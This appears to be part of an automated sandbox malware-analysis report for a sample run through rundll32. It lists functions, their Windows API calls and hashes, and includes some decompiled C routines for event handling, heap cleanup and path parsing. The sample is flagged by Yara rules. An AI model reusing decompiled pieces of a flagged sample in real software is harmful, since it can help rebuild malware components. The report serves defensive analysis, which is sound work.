                          • GetLastError.KERNEL32(?,05B6E4AF,?,?,00001000,?,?,00001000), ref: 05B74AB6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                          • String ID:
                          • API String ID: 3370347312-0
                          • Opcode ID: 7b891ad2d8db149b465d88c9190cbfb1434dc3068946f9a0c00ffb7daeb792cd
                          • Instruction ID: d73337ff2b38083d841eaebc7513cb6ceb2895bde6b4119e0efa64c2c56f15c1
                          • Opcode Fuzzy Hash: 7b891ad2d8db149b465d88c9190cbfb1434dc3068946f9a0c00ffb7daeb792cd
                          • Instruction Fuzzy Hash: 93F04F31244608FBDF219F60AC0AF7A3E67FF05711F200114FA12AA1E0EB71B561DBA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7D5F3 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B7D601
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05B6DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7D616
                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,05B63EC6,?,?), ref: 05B7D623
                          • CloseHandle.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7D635
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEvent$CloseHandlememset
                          • String ID:
                          • API String ID: 2812548120-0
                          • Opcode ID: 1e9cbbe9ec67b48f98e2111ca2f0099a269ca46a05d5b1ed9a873c46af977fe8
                          • Instruction ID: 07a84c00b3dce76012e5aacab934ae1d4091009500d886fbaad000b70bd3e881
                          • Opcode Fuzzy Hash: 1e9cbbe9ec67b48f98e2111ca2f0099a269ca46a05d5b1ed9a873c46af977fe8
                          • Instruction Fuzzy Hash: 79F05EB510430C7FD3206F26DCC4C27BFEDFF56298B11496EF15682141CA71F8058A64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100227F Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0100227F(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                          0x01002289
                          0x0100228d
                          0x010022a2
                          0x010022a4
                          0x010022a9
                          0x010022af
                          0x010022b1
                          0x010022b6
                          0x010022c1
                          0x010022b8
                          0x010022b8
                          0x010022b8
                          0x010022b6
                          0x010022cf

                          APIs
                          • memset.NTDLL ref: 0100228D
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76CC81D0,00000000,00000000), ref: 010022A2
                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010022AF
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 010022C1
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CreateEvent$CloseHandlememset
                          • String ID:
                          • API String ID: 2812548120-0
                          • Opcode ID: 7889234dc81e934937a0a035855a81381ae41a736ce7f101b8928bdeb58a69fe
                          • Instruction ID: 4f997f0634414085f36d5cfea56143d19d908c1e0a0bcff07f9ba5edbeaf6ed8
                          • Opcode Fuzzy Hash: 7889234dc81e934937a0a035855a81381ae41a736ce7f101b8928bdeb58a69fe
                          • Instruction Fuzzy Hash: C6F05EB11047087FE321AF66DCC4C2BFBECEB461A8F11892EF18692141C676A8088F70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B74AC4 Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,05B64BD6,000000FF,05FBB7F0,?,?,05B7B7F2,0000003A,05FBB7F0), ref: 05B74AE0
                          • GetLastError.KERNEL32(?,?,05B7B7F2,0000003A,05FBB7F0,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008), ref: 05B74AEB
                          • WaitNamedPipeA.KERNEL32(00002710), ref: 05B74B0D
                          • WaitForSingleObject.KERNEL32(00000000,?,?,05B7B7F2,0000003A,05FBB7F0,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C), ref: 05B74B1B
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                          • String ID:
                          • API String ID: 4211439915-0
                          • Opcode ID: 7546d50412fc2ebafd4215447eefe1c08dd27338420e3a5fb09881070ce08c5a
                          • Instruction ID: a23761cfcb6a3714f11a834273a7cbb66fd1f288124927f2396cc71d0cf9929d
                          • Opcode Fuzzy Hash: 7546d50412fc2ebafd4215447eefe1c08dd27338420e3a5fb09881070ce08c5a
                          • Instruction Fuzzy Hash: 00F06D32A05124BBD7302A65EC4EF6B7E66EF01376F215661FA29A72E0CA217C41C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B80DDD Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,?,00000000,05B67BEE), ref: 05B80DE2
                          • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05B80DF7
                          • wsprintfA.USER32 ref: 05B80E13
                            • Part of subcall function 05B7C01F: memset.NTDLL ref: 05B7C034
                            • Part of subcall function 05B7C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 05B7C06D
                            • Part of subcall function 05B7C01F: wcstombs.NTDLL ref: 05B7C077
                            • Part of subcall function 05B7C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 05B7C0A8
                            • Part of subcall function 05B7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0D4
                            • Part of subcall function 05B7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 05B7C0EA
                            • Part of subcall function 05B7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,05B6A645), ref: 05B7C0FE
                            • Part of subcall function 05B7C01F: CloseHandle.KERNEL32(?), ref: 05B7C131
                            • Part of subcall function 05B7C01F: CloseHandle.KERNEL32(?), ref: 05B7C136
                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05B80E2F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                          • String ID:
                          • API String ID: 1624158581-0
                          • Opcode ID: 5586afaf71d7200afa8db9151feb0fa0d5048443751b60add41a2f80b5690be9
                          • Instruction ID: f18b353b61e8cfed56158f73c350715747a24175a1d64bc3a2a7005e409c195d
                          • Opcode Fuzzy Hash: 5586afaf71d7200afa8db9151feb0fa0d5048443751b60add41a2f80b5690be9
                          • Instruction Fuzzy Hash: D2F0B4316100117BC6302629EC0EF7B7FAEEBC2765F162151FA01E7291CE20F809D6A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B66537 Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B66540
                          • Sleep.KERNEL32(0000000A), ref: 05B6654A
                          • HeapFree.KERNEL32(00000000,?), ref: 05B66572
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B66590
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                          • String ID:
                          • API String ID: 58946197-0
                          • Opcode ID: 153a0094071c2a458eead6c85949b0c4469ac091439f29b77abc8657540c9850
                          • Instruction ID: e9922c59ccb1e4b9bc49341156d6b11f132b9fd28772dfcc2b628ea27d863b93
                          • Opcode Fuzzy Hash: 153a0094071c2a458eead6c85949b0c4469ac091439f29b77abc8657540c9850
                          • Instruction Fuzzy Hash: 7BF03471210240EFEB209F28E84BF3A3FA6EF00300F009456B506EB291CA28F840DB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01007607 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E01007607() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x100a30c; // 0x2d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x100a35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x100a30c; // 0x2d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x100a2d8; // 0x4ea0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                          0x01007607
                          0x0100760e
                          0x01007658
                          0x0100765a
                          0x0100765a
                          0x01007612
                          0x01007618
                          0x0100761d
                          0x01007621
                          0x01007627
                          0x0100762e
                          0x00000000
                          0x00000000
                          0x01007630
                          0x01007635
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01007635
                          0x01007637
                          0x0100763f
                          0x01007642
                          0x01007642
                          0x01007648
                          0x0100764f
                          0x01007652
                          0x01007652
                          0x00000000

                          APIs
                          • SetEvent.KERNEL32(000002D0,00000001,01005E70), ref: 01007612
                          • SleepEx.KERNEL32(00000064,00000001), ref: 01007621
                          • CloseHandle.KERNEL32(000002D0), ref: 01007642
                          • HeapDestroy.KERNEL32(04EA0000), ref: 01007652
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CloseDestroyEventHandleHeapSleep
                          • String ID:
                          • API String ID: 4109453060-0
                          • Opcode ID: 931d9ebe303f37c4293f369cfece101ef145e536fd1af6cd669769464db71d1e
                          • Instruction ID: 4ede886923f4278a8d8dcb734d4052e0ccbdaf89282462309787d769e2397809
                          • Opcode Fuzzy Hash: 931d9ebe303f37c4293f369cfece101ef145e536fd1af6cd669769464db71d1e
                          • Instruction Fuzzy Hash: AFF01C71B013129BFB329B3D9C4CA423BD8AB18661F048550BEC6D32C9CB6EE4449760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B80B2C Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B80B35
                          • Sleep.KERNEL32(0000000A), ref: 05B80B3F
                          • HeapFree.KERNEL32(00000000), ref: 05B80B6D
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B80B82
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                          • String ID:
                          • API String ID: 58946197-0
                          • Opcode ID: b2cf2ee06b402ca0212c581c42681d00ba59d80a204424b45d834b3aff717e84
                          • Instruction ID: 8d994ea26fe3bcf2241f36a98f82eec33e5e4e347b27b64e028cedb3ba0151a4
                          • Opcode Fuzzy Hash: b2cf2ee06b402ca0212c581c42681d00ba59d80a204424b45d834b3aff717e84
                          • Instruction Fuzzy Hash: 4AF034B4260601EFE718AB14E88AF393FA2FF00354B086049F802DB290CB38FC44DA21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010072C7 Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 37%
                          			E010072C7() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x100a3cc; // 0x52995b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x100a3cc; // 0x52995b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x100a3cc; // 0x52995b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x100b827) {
					HeapFree( *0x100a2d8, 0, _t10);
					_t7 =  *0x100a3cc; // 0x52995b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                          0x010072c7
                          0x010072d0
                          0x010072e0
                          0x010072e0
                          0x010072e5
                          0x010072ea
                          0x00000000
                          0x00000000
                          0x010072da
                          0x010072da
                          0x010072ec
                          0x010072f1
                          0x010072f5
                          0x01007308
                          0x0100730e
                          0x0100730e
                          0x01007317
                          0x01007319
                          0x0100731d
                          0x01007323

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05299570), ref: 010072D0
                          • Sleep.KERNEL32(0000000A), ref: 010072DA
                          • HeapFree.KERNEL32(00000000), ref: 01007308
                          • RtlLeaveCriticalSection.NTDLL(05299570), ref: 0100731D
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                          • String ID:
                          • API String ID: 58946197-0
                          • Opcode ID: ef42c8ef87503e07213293b3f7307d2dcccb7fcfbf7175455b70b3933a4ab03c
                          • Instruction ID: a28cd2f3dff1bba8cd488240954b6b9d06cd987101cc35d308e21a22ef1fa919
                          • Opcode Fuzzy Hash: ef42c8ef87503e07213293b3f7307d2dcccb7fcfbf7175455b70b3933a4ab03c
                          • Instruction Fuzzy Hash: A2F0D474300201DFF73ACB58E849B2A37E5AB44314F049058F9CAE72A9C67EAC00CB24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B70901 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B7095D
                          • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,05B6C1F8,00000000), ref: 05B709AB
                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,05B81616,00000000,05B6C1F8,05B7E6A0,00000000,05B6C1F8,05B700C3,00000000,05B6C1F8,05B6306D,00000000), ref: 05B70CB6
                          • GetLastError.KERNEL32(?,00000000,?), ref: 05B70FB8
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseErrorFreeHandleHeapLastmemset
                          • String ID:
                          • API String ID: 2333114656-0
                          • Opcode ID: 2b2b478c47e0bacbd4ff33c26785f4f3fecb881b43a4ca71bb580ea4a0c510dd
                          • Instruction ID: c346912f3efcd1bfcc1231c58cd9052c39fbe7dc47b93bd3d0b56a0fb1a64e2b
                          • Opcode Fuzzy Hash: 2b2b478c47e0bacbd4ff33c26785f4f3fecb881b43a4ca71bb580ea4a0c510dd
                          • Instruction Fuzzy Hash: 4D51C63124860DBEDB11BE74DC4DF7B766AFB55210F1000D3F935AA180DA70FA519E52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6A78E Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B763D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?), ref: 05B763F5
                            • Part of subcall function 05B763D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B76407
                            • Part of subcall function 05B763D1: wcstombs.NTDLL ref: 05B76415
                            • Part of subcall function 05B763D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?), ref: 05B76439
                            • Part of subcall function 05B763D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05B7644E
                            • Part of subcall function 05B763D1: mbstowcs.NTDLL ref: 05B7645B
                            • Part of subcall function 05B763D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?,?), ref: 05B7646D
                            • Part of subcall function 05B763D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,05B6A7C4,?,?,?,?,?), ref: 05B76487
                          • GetLastError.KERNEL32 ref: 05B6A82D
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05B73C58
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05B73C7C
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,05B617D6,?,?,?,?,?,?,?), ref: 05B73C8A
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6A849
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6A85A
                          • SetLastError.KERNEL32(00000000), ref: 05B6A85D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                          • String ID:
                          • API String ID: 3867366388-0
                          • Opcode ID: dfabf352fc3df84f252caf208220c9b63f1b6f00f77a10f5cbac1357888a359c
                          • Instruction ID: 652ffc51c74b2573552bf003e8f60c1cee2190a1bda98b74d1040d0f5b55a389
                          • Opcode Fuzzy Hash: dfabf352fc3df84f252caf208220c9b63f1b6f00f77a10f5cbac1357888a359c
                          • Instruction Fuzzy Hash: CC313032900108FFCF129F99DC458EEBFB6FF48710B104196F926A2161D735AA51EF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6174F Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B7D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D6F2
                            • Part of subcall function 05B7D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D710
                            • Part of subcall function 05B7D698: RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 05B7D73C
                            • Part of subcall function 05B7D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D753
                            • Part of subcall function 05B7D698: HeapFree.KERNEL32(00000000,00000000), ref: 05B7D766
                            • Part of subcall function 05B7D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,05B61785,?,?,?,?,?), ref: 05B7D775
                          • GetLastError.KERNEL32 ref: 05B617EE
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05B73C58
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 05B73C7C
                            • Part of subcall function 05B73BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,05B617D6,?,?,?,?,?,?,?), ref: 05B73C8A
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6180A
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6181B
                          • SetLastError.KERNEL32(00000000), ref: 05B6181E
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                          • String ID:
                          • API String ID: 2451549186-0
                          • Opcode ID: 3523f2b443b1f7305ca5fcb7df2c2da59c1a9c1d2f7679fa673179e1e5d6fbdc
                          • Instruction ID: 81914b54e28758f5d6320b391b8dfe5436e8dd887c6d6b60a88e17201078381e
                          • Opcode Fuzzy Hash: 3523f2b443b1f7305ca5fcb7df2c2da59c1a9c1d2f7679fa673179e1e5d6fbdc
                          • Instruction Fuzzy Hash: 31312972900108FFCF129F99DC45CAEBFB6FF48720B104596F926A2160D735AA61EF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B66FC7 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 30a66862894a7ea5392222b2030e00281d427d8e7430966517e03a841f2e3589
                          • Instruction ID: 0d39fef5833a1c063f4f19f4e91daf254d16effd7a90f9da3e20f0651a694192
                          • Opcode Fuzzy Hash: 30a66862894a7ea5392222b2030e00281d427d8e7430966517e03a841f2e3589
                          • Instruction Fuzzy Hash: AF216DB6601919BFCB219F60DC8496ABB69FF09305B140199E94686C50DB36F4B1CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6D429 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?,?,00000000), ref: 05B6D435
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                            • Part of subcall function 05B82DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,05B6D463,00000000,00000001,00000001,?,?,05B7DD0F,00000000,00000000,00000004,00000000), ref: 05B82DF1
                            • Part of subcall function 05B82DE3: StrChrA.SHLWAPI(?,0000003F,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?,?,00000000,05B63EC6,?), ref: 05B82DFB
                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,05B7DD0F,00000000,00000000,00000004,00000000,?,05B6DBAC,?), ref: 05B6D493
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05B6D4A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05B6D4AF
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                          • String ID:
                          • API String ID: 3767559652-0
                          • Opcode ID: 0bdd87f25be066947ada0fb77960621c0412b976e0226cb7665e997a042917d9
                          • Instruction ID: 091bd55fd004df548ef3ab781e6aa611771d786f4ad3445807a69a52020b8474
                          • Opcode Fuzzy Hash: 0bdd87f25be066947ada0fb77960621c0412b976e0226cb7665e997a042917d9
                          • Instruction Fuzzy Hash: 5D217276604255BFCB12AF64CC88ABE7FA9EF05290B048094F9059F201EB39FD00C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010045C4 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 58%
                          			E010045C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E01006D63(_t2);
				if(_t34 != 0) {
					_t30 = E01006D63(_t28);
					if(_t30 == 0) {
						E01006C2C(_t34);
					} else {
						_t39 = _a4;
						_t22 = E01007A57(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E01007A57(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                          0x010045c4
                          0x010045ce
                          0x010045d0
                          0x010045d6
                          0x010045d6
                          0x010045df
                          0x010045e3
                          0x010045ef
                          0x010045f3
                          0x01004667
                          0x010045f5
                          0x010045f5
                          0x010045f9
                          0x010045fe
                          0x01004603
                          0x0100461d
                          0x0100460c
                          0x0100460c
                          0x01004610
                          0x01004613
                          0x01004618
                          0x01004618
                          0x01004622
                          0x0100464a
                          0x01004650
                          0x01004653
                          0x01004624
                          0x01004626
                          0x0100462e
                          0x01004639
                          0x0100463e
                          0x0100463e
                          0x0100465a
                          0x01004661
                          0x01004662
                          0x01004662
                          0x010045f3
                          0x01004672

                          APIs
                          • lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,01006973,?,?,?,?,00000102,010037A0,?,?,76CC81D0), ref: 010045D0
